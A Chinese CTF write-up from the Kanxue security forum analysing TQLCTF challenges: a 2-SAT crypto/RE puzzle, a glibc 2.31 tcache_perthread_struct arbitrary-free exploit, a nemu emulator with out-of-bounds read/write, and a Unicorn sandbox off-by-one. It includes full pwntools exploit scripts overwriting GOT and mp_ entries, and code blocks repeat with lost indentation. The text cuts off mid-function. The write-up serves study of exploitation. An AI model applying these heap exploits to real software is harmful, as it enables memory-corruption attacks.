[原创]TQLCTF-RE/PWN方向部分题目详细分析与题解-Pwn-看雪-安全社区|安全招聘|kanxue.com

[原创]TQLCTF-RE/PWN方向部分题目详细分析与题解

发表于: 2022-3-1 12:29 12661

[原创]TQLCTF-RE/PWN方向部分题目详细分析与题解

Tokameine

2022-3-1 12:29

12661

本文为我个人在赛后对该比赛部分赛题所作的复现分析，可能会引用部分已公开的EXP，但文章的重点在于分析的过程而不是最终的结果，还请师傅们多多赐教，侵删致歉。

在遇到这题以前甚至都没接触过2-sat问题，所以这次也对这个问题做个概述吧。

以下内容摘自OI WIKI：

2-SAT，简单的说就是给出 n个集合，每个集合有两个元素，已知若干个<a,b>，表示 a与 b矛盾（其中 a与b属于不同的集合）。然后从每个集合选择一个元素，判断能否一共选n个两两不矛盾的元素。

而本题关键如下：

每轮打印比特流中的随机三位的比特状态，但这个状态有可能会取反。且取反与否发生的概率是0.5。

一开始是3-sat问题，每轮必有一个数是真实状态，另外两个数则可真可假。但3-sat是NP完全问题，基本属于不可解。所以首先我们根据明文的特殊条件消除不确定性。

因为字符串必定是可打印的字符串，其由ASCII码组成，最高位必定为0。那么这一位的状态必定是负数，如果打印出该位的状态是正数，则表示它并非必然真值，那么该组数据中另外两个必有一个为真。如果将所有带有上述情况的组别取出，问题便被缩减到2-sat，即必有一真，另一者可真可假。

2-sat问题存在多项式解法(这是结论，笔者并没有证明过)，即在数据量足够的情况下，该问题会有唯一解。本题一共给出了5000组数据，符合本条件。

而本题之后的解法也很朴素，在二选一的条件下，如果又出现了“必为负数”的位被以正数打印出来，那么最后一个数就必定真值了，将所有确定真值的位全都统计下来，就能还原完整的比特流。

参考Nu1L发布的WP自己改的：

任意地址free，没有泄露，没有PIE，本该是道简单题，结果做了一整天......看完官方WP之后发现自己还是想的太少了，不过我自己的方法姑且也打通了，所以先从笔者的方法开始吧。

libc版本是2.31，已经有tcache了。因为此前我很少接触这个部分，所以这次记的详细一些(个人其实不太愿意在需要之前主动去掌握利用方式，这看着有些像是在“为了利用而利用”)。

程序逻辑这里不再复述，唯一值得注意的就是，它会很快就把本轮开辟的chunk释放掉，所以很难在Bin中布置chunk。

任意地址free允许我们直接把tcache_perthread_struct释放，其结构如下：

可知该结构体大小为0x290，且能够控制Tcache bin的各项数据，包括链表和计数。

所以我们首先把它释放掉，然后向其中填充数据：

在写入数据之后，它会立刻把tcache_perthread_struct释放掉，不过现在会因为Tcache Bin已经满了，而被放到Unsorted Bin里。Bin结构如下：

首先我们先开辟0x50大小的chunk，将Unsorted Bin里的块分割开，避免里面挂着tcache_perthread_struct的头部(原因之后会解释)。

如果我们事前没有切割Unsorted Bin，会因为2.31版本的libc检测，发生如下异常：

malloc(): unsorted double linked list corrupted

因为之前Unsorted Bin中挂的是tcache_perthread_struct，在从tcache中取出chunk的时候，会把count减一，导致fd指针无所指向，构不成回环而错误(前几个版本还不这么严格，2.31显然变得苛刻了不少)

但这个错误是发生的puts时的，该函数会在输出时为字符串开辟堆空间，所以在开辟时企图从Unsorted Bin分配时才被检测到，不会影响从Tcache Bin中的分配。

另外，还需要注意的一点是，不能直接把free_got写成c3函数中绕过检查的地址。最后也会crash在puts中。但笔者目前不知道为什么写成main就可以，而写成c3就会crash，如果有师傅知道的话务必教教我。

笔者自己的完整EXP：

然后回到官方WP，出题人表示，能写got纯粹是一个意外，它的本意是利用io，大致逻辑如下：

官方EXP如下：(笔者自行添加了注释)

另外补充一些内容。虽然之前知道vtable的跳转，但我没深究过，这次遇到了，所以顺便做点总结。
puts函数在调用时会通过vtable访问_IO_file_xsput函数，该函数才是真正的puts实现，调用过程如下：

puts-->_IO_file_xsputn-->_IO_file_overflow-->_IO_doallocbuf
-->_IO_file_doallocate

_IO_file_doallocate中真正调用malloc开辟缓冲区，调用源码：

_IO_doallocbuf中通过跳转表调用_IO_file_doallocate开辟空间。

至此本题结束。

一个模拟器，个人认为难点在于把握整个程序的逻辑。因为程序本身的体量不小，光是漏洞发觉就需要好一阵子。

help命令可以知道一共有多少命令可用。

阅读源代码可知，初始化阶段调用load_img加载image，nemu使用的image内容如下：

程序只给了一部分实现，像是exec_real函数就并未给出源代码，因此只能靠逆向完成。其大致过程如下：

其中，opcode_entry结构体如下：

decode和execute都是函数指针，它们指向解析指令函数和执行指令函数。

例如：exec_mov（本题似乎只实现了mov指令，其他指令的执行函数是无效的）

decoding是全局变量，指令会先被解析到decoding中，然后在exec_mov中使用该结构。结构如下：

阅读大致源码就能发现，nemu在模拟指令执行流程，但每一条指令都不是真正被执行的，并且也由于它实现的指令数量太少，不可能通过加载字节码的方式来利用，所以应该另寻他路。

但注意到所谓image是一个数组，通过下述定义：

其既然作为全局变量被声明，就说明它并非开辟在栈上，但也因为它过大的尺寸且不需要初值，所以被置于不占空间的bss段上，那么访问该映像就是访问bss。注意到nemu提供了指令x用于获取对应地址的内容，其关键实现如下：

能够发现，它没有对地址进行限定，也就是说，能够访问超出image范围的内存，实现任意地址读(指任意高地址读)。

同时，指令set的核心实现vaddr_write如下：

0x6A3B80LL就是pmem，这里同样没有做地址限制，能够实现任意地址写(但必须注意，任意地址写并不准确，只能往pmem的高地址任意写，没办法向低地址写)。

既然已经能任意地址读写了，那我们的目的自然也就明确了，读出libc_base，然后某个函数为one_gadget就行了。

看起来这样好像就行了，但如果没看过wp就不会这么顺利了，也把其他指令分析一下看看吧。

指令w的核心是set_watchpoint：（精简后）

nemu对watchpoint的内存使用内存池管理，在初始化阶段通过init_wp_pool构建内存池：

head和free以及wp_pool都是watchpoint结构体指针，定义如下：

而wp_pool同时也是一个数组，但这方面不用多想，逻辑是朴素的：

内存池是wppool，初始化阶段会将整个内存池挂进free

申请wp时，从free中获取一个结构体；释放时，将目标放回free链表(均通过next指针)

head指针是指向使用中的wp结构体的
在调用set_watchpoint时，将申请到的结构体挂进head，通过head遍历所有的wp

这里同样有能够利用的地方，重点如下：

如果我们能够修改free_的内容为某个地址，就能通过指令w向该地址写入数据了

不过会否有些多此一举？不是已经能够任意地址写了吗？那这有什么意义呢？

尽管已经能够任意地址写了，但vaddr_write是写4字节，set_watchpoint能一次写入0x28字节；并且，我们需要把写入地址传给vaddr_write，这些参数会经过expr的处理，经笔者测试后发现，对于一些较大的地址参数会被越过而无法写入。不过expr函数的主要作用就是解析参数，似乎我们不应该费力去分析它的工作流程，所以笔者对w指令的分析到此为止，不再深入

指令d的核心是delete_watchpoint，是指令w的逆操作，这里不再赘述。而指令p、指令q等则未完成，所以没有实现。

至此我们已经分析完会接触到的所有指令，并有了思路，接下来是利用。

首先我们应该泄露libc_base。但读取数据是有限制的，首先，我们只能读取pmem的高位，其次，不能高出太多，最多是四个字节的表示范围内。所以我们应该从bss中找一个能够获取chunk地址的数据。通过调试，我们选择re为目标：

这个数组在初始化完成以后会被放入一系列的缓冲区，大致结构如下：

buffer是从堆上开辟的，任意读一个buffer出来，我们都能拿到堆的基址：

然后通过调试找一块在当前状态下fd或bk未没清空的chunk(笔者试着在Bin中查找，但那个方法不太起效，所以直接通过gdb的heap指令找了一块出来)：

接下来就需要写got表了，但我们知道，got表在pmem的低地址处，正常操作写不到它，因此这里需要用到指令w来做另外一种写数据：

指令w的关键汇编如下：

eax是我们的参数低4位，而rcx则是free。该函数会将free取出，并在[rcx+30h]处放入eax，我们由此完成got表的篡改。

最后只需要调用printf_chk函数即可。

笔者自己的完整exp：

第一次接触Unicorn，虽然之前也遇到过类似的题目，但当时受限于技术水平，连WP都不能很好的理解，这次算是正式接触这类模拟器了。

Unicorn是一款成熟的开源CPU模拟器，本题通过该项目实现了一个简单的虚拟机。其main函数简化后的主要逻辑如下：(出于可读性考虑，所以简化代码后不考虑代码是否可执行)

大致意思是：

初始化一台模拟器，将用户输入的机器码映射到模拟器的0x400000地址处，然后注册一个syscall_hook，当模拟器内执行syscall指令时，调用hook中的实现。最后将模拟器的ecx和edx寄存器内容读出显示给用户。

handle_syscall函数简化后的逻辑如下：

文件结构如下：

另外，本题开启了沙箱，具体代码如下：

沙箱规则这里就不细究了，大致意思就是只能使用orw三个调用。

这里笔者只截取核心实现：fd_malloc

注意到第22行的strcpy函数，它将a1按字节传入v6->name，根据文件结构可知，如果a1字符串足够长，就应该能从name溢出到malloc_buf，因为strcpy会一直拷贝直到src遇到'\x00'字符为止。

而在system_open函数中可以发现，a1的来源如下：

此处的a1是模拟器本身，uc_reg_read会从edi和esi寄存器中分别读出数据放入v3和size，v3则是字符串指针，再通过uc_mem_read将指针处字符串读出，写入name数组。

但值得注意的是，uc_mem_read最多读取24个字符，所以name只会有24个字符。

同时我们可以知道，文件结构中的name字段也是24个字符，而strcpy函数会在dest字符串尾部用'\x00'填充。因此，如果name填满24字节，就会有一个'\x00'溢出到malloc_buf处导致off-by-one漏洞。

同样只看关键部分：

write_func是之前储存在文件结构中的函数指针，其实现如下：

首先通过fileno找到对应的文件，然后用memcpy将buf中的内容拷贝到fd->malloc_buf中。

通过memcpy将fd->malloc_buf的数据拷贝到buf里。

释放fd->malloc_buf并置零，其他参数数据清空，全局fd计数器减一。

但必须注意的是，对于stdin、stdout、stderr，它们有自己另外的处理函数：

如果inode编号是这三个，就不会调用malloc_xxx了。

整个程序关键的函数只有上面这几个，我们目前只发现了一个在open中的漏洞。

首先我们能够溢出fd->malloc_buf，那么就能将对应地址释放，然后造成uaf。

首先我们需要泄露libc基址。因为用户是没办法和虚拟机直接交互的，并且unicorn中模拟的程序与我们有着完全不同的地址空间，因此我们想要泄露用户层的地址就只能依托，因此直接通过字节码来获取数据是行不通的，因为我们的数据和它们的数据在理论上是隔离的。

但有一个地方并没用隔离开，就是fd->malloc_buf，这个buf是从用户空间开辟出来的，里面会存有用户空间的数据。

以下利用方式主要参考Nu1L战队给出的exp

我们先试着随便放点可执行的机器码进去，然后看看此时的堆状态：

注意到unsortedbin和largebins此时是有内容的，而开辟是使用malloc，不会清空内容。那么我们只要通过system_open让fd->malloc_buf从unsortedbin或largebins中开辟内容，然后用write将它们写出来，就泄露了libc地址。

尽管现在泄露了地址，但利用却有些困难。Unicorn是以外部链接库的方式被调用的，我们不清楚它在执行过程中调用了多少malloc和free(除非我们真的去阅读源代码了，但似乎不太现实)，所以布置起来会有些麻烦。但还是有些特别的小技巧可用。

观察之前的堆状态我们可以知道，有个别几个Bin像是不被库调用的，比如size=0x60/0x80/0xc0等，这些大小的chunk在Tcache bin中不存在，保守估计，我们能够找到一个完全由我们自己控制的大小块，这样就不需要担心因为调用库而被干扰了。

在上面泄露地址时：

调用本行时，会申请0xc0大小的chunk，该chunk就很有可能不会被影响到。

接下来的思路是：

首先关闭inode 3，将0xc0的chunk释放到tcache bin，然后通过off-by-one溢出到该chunk的上方，然后write该chunk去向下覆盖其fd指针，这样就能在之后开辟chunk到该fd。

我们可以让它是__free_hook，那么就能写成one_gadget或其他各种各样了(不过本题开启了沙箱，所以one_gadget不行，还是得老老实实orw拿出flag)。

剩下的payload就不言而喻了，直接给出Nu1L师傅们的exp吧：(自己加了点注释)

def get_lit(i):

    return (i+1) * (2*int(bits[i])-1)
 
for t in range(N):

    i = random.randint(0,n-1)

    p = random.randint(0,2)

    true_lit = get_lit(i)

    for j in range(3):

        if j == p:

            print(true_lit)

        else:

            tmp = random.randint(0,n-1)

            rand_true = get_lit(tmp)

            if random.randint(0,3)==0:

                print(rand_true)

            else:

                print(-rand_true)

def get_lit(i):

return (i+1) * (2*int(bits[i])-1)

for t in range(N):

i = random.randint(0,n-1)

p = random.randint(0,2)

true_lit = get_lit(i)

for j in range(3):

if j == p:

print(true_lit)

else:

tmp = random.randint(0,n-1)

rand_true = get_lit(tmp)

if random.randint(0,3)==0:

print(rand_true)

else:

print(-rand_true)

f = open("output.txt")             

n = int(f.readline().rstrip('\n'))

N = int(f.readline().rstrip('\n'))
 
x=[]

for i in range(1,5000):

    x1=int(f.readline())

    x2=int(f.readline())

    x3=int(f.readline())

    x.append([x1,x2,x3])
 
true_numer=[]

for i in range(n//8):

    true_numer.append(-8*i-1)
 
flag=[]

for i in range(n):

    flag.append(0)

for i in x:

    if(((-i[0] in true_numer) + (-i[1] in true_numer) + (-i[2] in true_numer))==2):

        count+=1

        for j in range(3):

            if((i[j] not in true_numer)and(-i[j]not in true_numer)):

                    true_numer+= [i[j]]
 
for i in true_numer:

    if(i<0):

        flag[abs(i)-1]=0

    else:

        flag[i-1]=1

flag_text=""

for i in flag:

    flag_text+=str(i)
 
print(bytes.fromhex(hex(int(flag_text,2))[2:]))
 
f.close()

f = open("output.txt")

n = int(f.readline().rstrip('\n'))

N = int(f.readline().rstrip('\n'))

x=[]

for i in range(1,5000):

x1=int(f.readline())

x2=int(f.readline())

x3=int(f.readline())

x.append([x1,x2,x3])

true_numer=[]

for i in range(n//8):

true_numer.append(-8*i-1)

flag=[]

for i in range(n):

flag.append(0)

for i in x:

if(((-i[0] in true_numer) + (-i[1] in true_numer) + (-i[2] in true_numer))==2):

count+=1

for j in range(3):

if((i[j] not in true_numer)and(-i[j]not in true_numer)):

true_numer+= [i[j]]

for i in true_numer:

if(i<0):

flag[abs(i)-1]=0

else:

flag[i-1]=1

flag_text=""

for i in flag:

flag_text+=str(i)

print(bytes.fromhex(hex(int(flag_text,2))[2:]))

f.close()

typedef struct tcache_perthread_struct
{

  uint16_t counts[TCACHE_MAX_BINS];//TCACHE_MAX_BINS=64

  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
 
typedef struct tcache_entry
{

  struct tcache_entry *next;

  struct tcache_perthread_struct *key;
} tcache_entry;

typedef struct tcache_perthread_struct

{

uint16_t counts[TCACHE_MAX_BINS];//TCACHE_MAX_BINS=64

tcache_entry *entries[TCACHE_MAX_BINS];

} tcache_perthread_struct;

typedef struct tcache_entry

{

struct tcache_entry *next;

struct tcache_perthread_struct *key;

} tcache_entry;

#首先我们先开辟一个chunk让它放到tcache bin里，事后备用

payload1='aaaaaaaa'

create_chunk(0x28,payload1)
#然后释放tcache_perthread_struct

free_index(-0x290)
#接下来将tcache里的count全都置7，表示装满，以后的chunk就不会再放到这里了
#同时在里面将几个next指向free_got和target_addr
#这样我们之后就能向free_got和target写入数据了

payload1=(p16(7)*0x28).ljust(128,b'\x00')+(p64(free_got)+p64(target_addr)+p64(0)+p64(0))

create_chunk(0x288,payload1)

#首先我们先开辟一个chunk让它放到tcache bin里，事后备用

payload1='aaaaaaaa'

create_chunk(0x28,payload1)

#然后释放tcache_perthread_struct

free_index(-0x290)

#接下来将tcache里的count全都置7，表示装满，以后的chunk就不会再放到这里了

#同时在里面将几个next指向free_got和target_addr

#这样我们之后就能向free_got和target写入数据了

payload1=(p16(7)*0x28).ljust(128,b'\x00')+(p64(free_got)+p64(target_addr)+p64(0)+p64(0))

create_chunk(0x288,payload1)

tcachebins

0x20 [64480]: 0x404018 (free@got.plt) —▸ 0x7f1f03f31850 (free) ◂— endbr64 

0x30 [1031]: 0x404080 (target) ◂— 0xfedcba9876543210
.......

0x280 [  7]: 0x0

0x290 [  7]: 0x0
unsortedbin

all: 0x1866000 —▸ 0x7f1f0407fbe0 (main_arena+96) ◂— 0x1866000

tcachebins

0x20 [64480]: 0x404018 (free@got.plt) —▸ 0x7f1f03f31850 (free) ◂— endbr64

0x30 [1031]: 0x404080 (target) ◂— 0xfedcba9876543210

.......

0x280 [ 7]: 0x0

0x290 [ 7]: 0x0

unsortedbin

all: 0x1866000 —▸ 0x7f1f0407fbe0 (main_arena+96) ◂— 0x1866000

#这里payload1没变，其实填什么都行，目的只是分割罢了

create_chunk(0x48,payload1)
#然后将free_got写成main，而0x401040是默认数据
#在从tcache bin中获取chunk时，会将key部分写为0，这会导致free的下一个函数被清零
#所以恢复其中未装载时的状态，防止调用它时发生异常

payload1=p64(main_addr)+p64(0x401040)

create_chunk(0x18,payload1)
#然后再把target拿下来，随便写点数据进去就行了，只要不是原数就行

create_chunk(0x28,payload1)
#最后我们调用c3函数即可
open_flag()

#这里payload1没变，其实填什么都行，目的只是分割罢了

create_chunk(0x48,payload1)

#然后将free_got写成main，而0x401040是默认数据

#在从tcache bin中获取chunk时，会将key部分写为0，这会导致free的下一个函数被清零

#所以恢复其中未装载时的状态，防止调用它时发生异常

payload1=p64(main_addr)+p64(0x401040)

create_chunk(0x18,payload1)

#然后再把target拿下来，随便写点数据进去就行了，只要不是原数就行

create_chunk(0x28,payload1)

#最后我们调用c3函数即可

open_flag()

from pwn import *

context.log_level = 'debug'

p = process('./pwn')

elf=ELF('./pwn')

malloc=0x401387

free=0x4013fd

ret=0x40154D
 
free_got=elf.got['free']

target_addr=0x404080

ptr_addr=free_got

main=0x40152D

mas=0x401473

mas=main
 
def create_chunk(size,context):

    p.sendline(str(1))

    p.sendline(str(size))

    p.sendline(context)
 
def free_index(index):

    p.sendline(str(2))

    p.sendline(str(index))
 
def open_flag():

    p.sendline(str(3))
 
payload1='aaaaaaaa'

create_chunk(0x28,payload1)
 
free_index(-0x290)

payload1=(p16(7)*0x28).ljust(128,b'\x00')+(p64(ptr_addr)+p64(target_addr)+p64(0)+p64(0))
 
create_chunk(0x288,payload1)
 
create_chunk(0x48,payload1)

payload1=p64(mas)+p64(0x401040)
 
create_chunk(0x18,payload1)

create_chunk(0x28,payload1)
 
open_flag()
p.interactive()

from pwn import *

context.log_level = 'debug'

p = process('./pwn')

elf=ELF('./pwn')

malloc=0x401387

free=0x4013fd

ret=0x40154D

free_got=elf.got['free']

target_addr=0x404080

ptr_addr=free_got

main=0x40152D

mas=0x401473

mas=main

def create_chunk(size,context):

p.sendline(str(1))

p.sendline(str(size))

p.sendline(context)

def free_index(index):

p.sendline(str(2))

p.sendline(str(index))

def open_flag():

p.sendline(str(3))

payload1='aaaaaaaa'

create_chunk(0x28,payload1)

free_index(-0x290)

payload1=(p16(7)*0x28).ljust(128,b'\x00')+(p64(ptr_addr)+p64(target_addr)+p64(0)+p64(0))

create_chunk(0x288,payload1)

create_chunk(0x48,payload1)

payload1=p64(mas)+p64(0x401040)

create_chunk(0x18,payload1)

create_chunk(0x28,payload1)

open_flag()

p.interactive()

static struct malloc_par mp_ =
{

  .top_pad = DEFAULT_TOP_PAD,

  .n_mmaps_max = DEFAULT_MMAP_MAX,

  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,

  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))

  .arena_test = NARENAS_FROM_NCORES (1)
#if USE_TCACHE

  ,

  .tcache_count = TCACHE_FILL_COUNT,

  .tcache_bins = TCACHE_MAX_BINS,

  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),

  .tcache_unsorted_limit = 0 /* No limit.  */
#endif
};

static struct malloc_par mp_ =

{

.top_pad = DEFAULT_TOP_PAD,

.n_mmaps_max = DEFAULT_MMAP_MAX,

.mmap_threshold = DEFAULT_MMAP_THRESHOLD,

.trim_threshold = DEFAULT_TRIM_THRESHOLD,

#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))

.arena_test = NARENAS_FROM_NCORES (1)

#if USE_TCACHE

,

.tcache_count = TCACHE_FILL_COUNT,

.tcache_bins = TCACHE_MAX_BINS,

.tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),

.tcache_unsorted_limit = 0 /* No limit. */

#endif

};

#!/usr/bin/env python3

from pwn import *

context(os='linux', arch='amd64')
#context.log_level='debug'
 
def exp():

    io = process('./pwn', stdout=PIPE)

    def malloc(size, content):

        io.sendlineafter(b'>', b'1')

        io.sendline(str(int(size)).encode())

        io.send(content)
 
    def tcache_count(l):

        res = [b'\x00\x00' for i in range(64)]

        for t in l:

            res[(t - 0x20)//0x10] = b'\x08\x00'

        return b''.join(res)
 
    try:

        #在top chunk中布置0x404078，扩大tcache之后，这些都会变为next指针

        malloc(0x1000, p64(0x404078)*(0x1000//8))

        #释放tcache_perthread_struct

        io.sendlineafter(b'>', b'2')

        io.sendline(b'-656')

        #首先把0x290的count置8，让tcache_perthread_struct放进unsorted bin

        malloc(0x280, tcache_count([0x290]) + b'\n')

        #然后分割tcache_perthread_struct，让tcache bin中的0x400和0x410项放入main_arena+96

        malloc(0x260, tcache_count([0x270]) + b'\n')

        #然后把0x400和0x410也拉满，然后把0x400里的地址低位改成0xf290

        #这是单纯的爆破，希望它能指向&mp_+0x10

        malloc(0x280, tcache_count([0x400, 0x410, 0x290]) + b'\x01\x00'*4*62 + b'\x90\xf2' + b'\n')

        #倘若指向了&mp_+0x10，那么就修改数据扩大tcache

        malloc(0x3f0, flat([

            0x20000,

            0x8,

            0,

            0x10000,

            0, 0, 0,

            0x1301000,

            2**64-1,

        ]) + b'\n')

        #调用puts，让它为stdout开辟缓冲区，此时会从tcache中获取chunk

        #但tcache中已经被布置了0x404078，所以会得到此处内存

        #并且这个内存处会被陷入puts的字符串

        io.sendlineafter(b'>', b'3')

        #此时target已被修改，直接调用即可成功

        io.sendlineafter(b'>', b'3')

        flaaag = io.recvall(timeout=2)

        print(flaaag)

        io.close()

        return True

    except:

        io.close()

        return False
 
i = 0

while i < 20 and not exp():

    i += 1

    continue

#!/usr/bin/env python3

from pwn import *

context(os='linux', arch='amd64')

#context.log_level='debug'

def exp():

io = process('./pwn', stdout=PIPE)

def malloc(size, content):

io.sendlineafter(b'>', b'1')

io.sendline(str(int(size)).encode())

io.send(content)

def tcache_count(l):

res = [b'\x00\x00' for i in range(64)]

for t in l:

res[(t - 0x20)//0x10] = b'\x08\x00'

return b''.join(res)

try:

#在top chunk中布置0x404078，扩大tcache之后，这些都会变为next指针

malloc(0x1000, p64(0x404078)*(0x1000//8))

#释放tcache_perthread_struct

io.sendlineafter(b'>', b'2')

io.sendline(b'-656')

#首先把0x290的count置8，让tcache_perthread_struct放进unsorted bin

malloc(0x280, tcache_count([0x290]) + b'\n')

#然后分割tcache_perthread_struct，让tcache bin中的0x400和0x410项放入main_arena+96

malloc(0x260, tcache_count([0x270]) + b'\n')

#然后把0x400和0x410也拉满，然后把0x400里的地址低位改成0xf290

#这是单纯的爆破，希望它能指向&mp_+0x10

malloc(0x280, tcache_count([0x400, 0x410, 0x290]) + b'\x01\x00'*4*62 + b'\x90\xf2' + b'\n')

#倘若指向了&mp_+0x10，那么就修改数据扩大tcache

malloc(0x3f0, flat([

0x20000,

0x8,

0,

0x10000,

0, 0, 0,

0x1301000,

2**64-1,

]) + b'\n')

#调用puts，让它为stdout开辟缓冲区，此时会从tcache中获取chunk

#但tcache中已经被布置了0x404078，所以会得到此处内存

#并且这个内存处会被陷入puts的字符串

io.sendlineafter(b'>', b'3')

#此时target已被修改，直接调用即可成功

io.sendlineafter(b'>', b'3')

flaaag = io.recvall(timeout=2)

print(flaaag)

io.close()

return True

except:

io.close()

return False

i = 0

while i < 20 and not exp():

i += 1

continue

_IO_new_file_overflow (FILE *f, int ch)
{

    ......

  /* If currently reading or no buffer allocated. */

  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)

    {

      /* Allocate a buffer if needed. */

      if (f->_IO_write_base == NULL)

    {

      _IO_doallocbuf (f);

      _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);

    }

    ......
}
libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)

_IO_new_file_overflow (FILE *f, int ch)

{

......

/* If currently reading or no buffer allocated. */

if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)

{

/* Allocate a buffer if needed. */

if (f->_IO_write_base == NULL)

{

_IO_doallocbuf (f);

_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);

}

......

}

libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)

(nemu) help

help - Display informations about all supported commands

c - Continue the execution of the program

q - Exit NEMU

si - Execute the step by one

info - Show all the regester' information

x - Show the memory things

p - Show varibeals and numbers

w - Set the watch point

d - Delete the watch point

set - Set memory

(nemu) help

help - Display informations about all supported commands

c - Continue the execution of the program

q - Exit NEMU

si - Execute the step by one

info - Show all the regester' information

x - Show the memory things

p - Show varibeals and numbers

w - Set the watch point

d - Delete the watch point

set - Set memory

static inline int load_default_img() {

  const uint8_t img []  = {

    0xb8, 0x34, 0x12, 0x00, 0x00,        // 100000:  movl  $0x1234,%eax

    0xb9, 0x27, 0x00, 0x10, 0x00,        // 100005:  movl  $0x100027,%ecx

    0x89, 0x01,                          // 10000a:  movl  %eax,(%ecx)

    0x66, 0xc7, 0x41, 0x04, 0x01, 0x00,  // 10000c:  movw  $0x1,0x4(%ecx)

    0xbb, 0x02, 0x00, 0x00, 0x00,        // 100012:  movl  $0x2,%ebx

    0x66, 0xc7, 0x84, 0x99, 0x00, 0xe0,  // 100017:  movw  $0x1,-0x2000(%ecx,%ebx,4)

    0xff, 0xff, 0x01, 0x00,

    0xb8, 0x00, 0x00, 0x00, 0x00,        // 100021:  movl  $0x0,%eax

    0xd6,                                // 100026:  nemu_trap

  };

  Log("No image is given. Use the default build-in image.");

  memcpy(guest_to_host(ENTRY_START), img, sizeof(img));

  return sizeof(img);
}

static inline int load_default_img() {

const uint8_t img [] = {

0xb8, 0x34, 0x12, 0x00, 0x00, // 100000: movl $0x1234,%eax

0xb9, 0x27, 0x00, 0x10, 0x00, // 100005: movl $0x100027,%ecx

0x89, 0x01, // 10000a: movl %eax,(%ecx)

0x66, 0xc7, 0x41, 0x04, 0x01, 0x00, // 10000c: movw $0x1,0x4(%ecx)

0xbb, 0x02, 0x00, 0x00, 0x00, // 100012: movl $0x2,%ebx

0x66, 0xc7, 0x84, 0x99, 0x00, 0xe0, // 100017: movw $0x1,-0x2000(%ecx,%ebx,4)

0xff, 0xff, 0x01, 0x00,

0xb8, 0x00, 0x00, 0x00, 0x00, // 100021: movl $0x0,%eax

0xd6, // 100026: nemu_trap

};

Log("No image is given. Use the default build-in image.");

memcpy(guest_to_host(ENTRY_START), img, sizeof(img));

return sizeof(img);

}

.data:000000000060F240 opcode_table    opcode_entry 0Fh dup(<0, offset exec_inv, 0>)

.data:000000000060F240                                         ; DATA XREF: exec_2byte_esc+9E↑o

.data:000000000060F240                                         ; exec_2byte_esc+A5↑r ...

.data:000000000060F240                 opcode_entry <0, offset exec_2byte_esc, 0>

.data:000000000060F240                 opcode_entry 56h dup(<0, offset exec_inv, 0>)

.data:000000000060F240                 opcode_entry <0, offset exec_operand_size, 0>

.data:000000000060F240                 opcode_entry 19h dup(<0, offset exec_inv, 0>)
......以下略

.data:000000000060F240 opcode_table opcode_entry 0Fh dup(<0, offset exec_inv, 0>)

.data:000000000060F240 ; DATA XREF: exec_2byte_esc+9E↑o

.data:000000000060F240 ; exec_2byte_esc+A5↑r ...

.data:000000000060F240 opcode_entry <0, offset exec_2byte_esc, 0>

.data:000000000060F240 opcode_entry 56h dup(<0, offset exec_inv, 0>)

.data:000000000060F240 opcode_entry <0, offset exec_operand_size, 0>

.data:000000000060F240 opcode_entry 19h dup(<0, offset exec_inv, 0>)

......以下略

typedef struct {

  DHelper decode;

  EHelper execute;

  int width;
} opcode_entry;

typedef struct {

DHelper decode;

EHelper execute;

int width;

} opcode_entry;

void __fastcall exec_mov(vaddr_t *eip_0)
{

  __int64 v1; // r9

  __int64 v2; // r9
 
  operand_write(&decoding.dest, &decoding.src.val);

  v1 = 108LL;

  if ( decoding.dest.width != 4 )

  {

    v1 = 98LL;

    if ( decoding.dest.width != 1 )

    {

      v1 = 63LL;

      if ( decoding.dest.width == 2 )

        v1 = 119LL;

    }

  }

  if ( __snprintf_chk(141182936LL, 80LL, 1LL, 80LL, "mov%c %s,%s", v1, decoding.src.str, decoding.dest.str) > 79 )

  {

    fflush(stdout);

    fwrite("\x1B[1;31m", 1uLL, 7uLL, stderr);

    fwrite("buffer overflow!", 1uLL, 0x10uLL, stderr);

    fwrite("\x1B[0m\n", 1uLL, 5uLL, stderr);

    v2 = 108LL;

    if ( decoding.dest.width != 4 )

    {

      v2 = 98LL;

      if ( decoding.dest.width != 1 )

      {

        v2 = 63LL;

        if ( decoding.dest.width == 2 )

          v2 = 119LL;

      }

    }

    if ( __snprintf_chk(141182936LL, 80LL, 1LL, 80LL, "mov%c %s,%s", v2, decoding.src.str, decoding.dest.str) > 79 )

      __assert_fail(

        "snprintf(decoding.assembly, 80, \"mov\" \"%c %s,%s\", (((&decoding.dest)->width) == 4 ? 'l' : (((&decoding.dest)"

        "->width) == 1 ? 'b' : (((&decoding.dest)->width) == 2 ? 'w' : '?'))), (&decoding.src)->str, (&decoding.dest)->str) < 80",

        "src/cpu/exec/data-mov.c",

        5u,

        "exec_mov");

  }
}

void __fastcall exec_mov(vaddr_t *eip_0)

{

__int64 v1; // r9

__int64 v2; // r9

operand_write(&decoding.dest, &decoding.src.val);

v1 = 108LL;

if ( decoding.dest.width != 4 )

{

v1 = 98LL;

if ( decoding.dest.width != 1 )

{

v1 = 63LL;

if ( decoding.dest.width == 2 )

v1 = 119LL;

}

if ( __snprintf_chk(141182936LL, 80LL, 1LL, 80LL, "mov%c %s,%s", v1, decoding.src.str, decoding.dest.str) > 79 )

{

fflush(stdout);

fwrite("\x1B[1;31m", 1uLL, 7uLL, stderr);

fwrite("buffer overflow!", 1uLL, 0x10uLL, stderr);

fwrite("\x1B[0m\n", 1uLL, 5uLL, stderr);

v2 = 108LL;

if ( decoding.dest.width != 4 )

{

v2 = 98LL;

if ( decoding.dest.width != 1 )

{

v2 = 63LL;

if ( decoding.dest.width == 2 )

v2 = 119LL;

}

if ( __snprintf_chk(141182936LL, 80LL, 1LL, 80LL, "mov%c %s,%s", v2, decoding.src.str, decoding.dest.str) > 79 )

__assert_fail(

